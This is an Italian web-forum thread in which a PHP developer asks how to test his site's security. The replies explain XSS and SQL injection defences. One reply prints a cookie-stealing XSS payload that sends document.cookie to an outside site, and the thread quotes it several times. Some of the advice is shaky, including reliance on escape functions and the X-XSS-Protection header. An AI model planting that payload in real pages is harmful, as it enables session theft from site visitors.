Sicurezza

[Nexus0100]

Giorno a tutti!
Mi sto occupando della realizzazione di un sito Web, fino a adesso ho utilizzato variabili di sessione e dei comandi di escape per mysql per evitare infiltrazioni...
La mia domanda adesso è:
Come posso testare la sicurezza del mio sito? Mi sono già rivolto ad amici nel settore ma non hanno saputo rispondermi, io ho pensato a delle injection ma ovviamente con l'escape non possono funzionare, le session non saprei come iniettarci dati all'interno, di usare sqlmap non ne parlo neanche, anche se strumento forse buono, vorrei evitare di ricorrere a programmi.
Ho pensato a iniettari dei comandi nei form che vengono passati come POST ma tanto i dati vengono solo usati per confronti o niente di più...
Suggerimenti?
Nel caso la protezione per l'admin è gestita anche da google authenticator, ma gli utenti non ne dispongono, però mi sorge il dubbio... C'è modo per iniettare file in uno spazio hosting con dei comandi? Spero di no, e poi in quel caso penso sarebbe responsabilità del servizio di Hosting giusto?
Grazie per l'attenzione ;D

[camionistaxcaso]

Intendi infiltrazioni di codice dannoso tipo javascript?
L' sql injection lo eviti?
Cosa usi per il db? Mysqli o PDO? Spero non le mysql che sono deprecate e non più funzionanti dalla versione 7 di PHP.

[Nexus0100]

Intendi infiltrazioni di codice dannoso tipo javascript?
L' sql injection lo eviti?
Cosa usi per il db? Mysqli o PDO? Spero non le mysql che sono deprecate e non più funzionanti dalla versione 7 di PHP.

Beh penso di si, puoi spiegarti meglio con le infiltrazioni di tipo javascript?
Per il db uso MariaDB con mysqli, e di PHP uso la versione 7.0.9 per l'appunto
Perciò cosa mi consigli?

[camionistaxcaso]

Si chiama cross site scripting (abbreviato xss), mi basta inserire questo codice per ricevere nel mio sito dati sensibili inseriti nei cookie di chi visiterà il tuo sito

codice:

<script>
document.location='http://www.miosito.com/pagina.php?cookies='+
document.cookie;
</script>

Risolvi con la funzione htmlentities() che trasforma i caratteri che il browser interpreta come codice
http://php.net/manual/en/function.htmlentities.php

Per quanto riguarda l' sql injection usi i prepared statement ?

[Nexus0100]

Si chiama cross site scripting (abbreviato xss), mi basta inserire questo codice per ricevere nel mio sito dati sensibili inseriti nei cookie di chi visiterà il tuo sito

codice:

<script>
document.location='http://www.miosito.com/pagina.php?cookies='+
document.cookie;
</script>

Risolvi con la funzione htmlentities() che trasforma i caratteri che il browser interpreta come codice
http://php.net/manual/en/function.htmlentities.php

Per quanto riguarda l' sql injection usi i prepared statement ?

Mmm capisco più o meno, adesso mi informo un poco, per le injection uso mysql_escape_string()...

[camionistaxcaso]

Con i prepared statement non serve nessuna pulizia dell' input, ci pensa mysql a farla

[Nexus0100]

Si chiama cross site scripting (abbreviato xss), mi basta inserire questo codice per ricevere nel mio sito dati sensibili inseriti nei cookie di chi visiterà il tuo sito

codice:

<script>
document.location='http://www.miosito.com/pagina.php?cookies='+
document.cookie;
</script>

Risolvi con la funzione htmlentities() che trasforma i caratteri che il browser interpreta come codice
http://php.net/manual/en/function.htmlentities.php

Per quanto riguarda l' sql injection usi i prepared statement ?

Ok, capisco, beh comunque anche se non lascio fare a sql usando quella funzione rendo comunque sicure le query giusto?
Inoltre per bloccare l'XSS mi basta modificare il file htaccess aggiungendo:

codice:

<IfModule mod_headers.c>
  Header set X-XSS-Protection "1; mode=block"
</IfModule>

giusto?

Un ultima domanda, ho visto che alla fin fine l'attacco xss è davvero semplice, se qualcuno ricavasse la password di amministratore o di un utente, e potesse effettuare caricamenti, è possibile creare il .js xss e rinominarlo in .jpg e richiamarlo, funzionerebbe lo stesso?
Oppure facendo file.js.jpeg è possibile bypassare il controllo PHP della funzione getimagesize()?
Scusa se non sono stato particolarmente chiaro


P.S: Ho visto che nel caso per caricare il file xss si potrebbe anche eseguire un attacco dos per accedere ai dati, ma in quel caso essendo un attacco Dos ne è responsabile il servizio di Hosting giusto?

[camionistaxcaso]

Ehehehehehe io sono cresciuto con il web, parto dall' alto e scendo, troppo in basso le mie conoscenze sono pari a zero

[Nexus0100]

Ehehehehehe io sono cresciuto con il web, parto dall' alto e scendo, troppo in basso le mie conoscenze sono pari a zero

Beh allora ti dirò... Provo anche se non ho tutto il necessario, ovviamente lo faccio su un mio sito